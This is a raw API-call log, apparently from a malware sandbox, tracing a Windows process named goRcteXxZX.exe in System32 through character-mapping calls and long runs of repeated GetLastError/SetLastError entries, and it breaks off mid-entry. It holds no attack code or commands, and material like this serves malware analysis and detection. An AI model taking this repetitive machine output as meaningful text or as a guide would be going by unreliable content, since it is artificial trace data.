\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ縖矲狰Ā") returned 256 [0033.110] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ縖矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.110] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ縖矲狰Ā", cchSrc=256, lpDestStr=0x12ead8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x12f2b4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x142sôìô\x12", lpUsedDefaultChar=0x0) returned 256 [0033.110] GetLastError () returned 0x0 [0033.110] SetLastError (dwErrCode=0x0) [0033.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f3b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.110] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f3b4, cbMultiByte=256, lpWideCharStr=0x12ed08, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ縖矲狰Ā") returned 256 [0033.110] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ縖矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.110] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ縖矲狰Ā", cchSrc=256, lpDestStr=0x12eaf8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x12f1b4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x142sôìô\x12", lpUsedDefaultChar=0x0) returned 256 [0033.110] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.111] GetLastError () returned 0x0 [0033.111] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.112] SetLastError (dwErrCode=0x0) [0033.112] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.113] SetLastError (dwErrCode=0x0) [0033.113] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.114] SetLastError (dwErrCode=0x0) [0033.114] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.115] GetLastError () returned 0x0 [0033.115] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.116] SetLastError (dwErrCode=0x0) [0033.116] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.117] SetLastError (dwErrCode=0x0) [0033.117] GetLastError () returned 0x0 [0033.118] SetLastError (dwErrCode=0x0) [0033.118] GetLastError () returned 0x0 [0033.118] SetLastError (dwErrCode=0x0) [0033.118] GetLastError () returned 0x0 [0033.125] SetLastError (dwErrCode=0x0) [0033.125] GetLastError () returned 0x0 [0033.125] SetLastError (dwErrCode=0x0) [0033.125] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.126] GetLastError () returned 0x0 [0033.126] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.127] SetLastError (dwErrCode=0x0) [0033.127] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.128] SetLastError (dwErrCode=0x0) [0033.128] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.129] GetLastError () returned 0x0 [0033.129] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.130] GetLastError () returned 0x0 [0033.130] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError (dwErrCode=0x0) [0033.131] GetLastError () returned 0x0 [0033.131] SetLastError 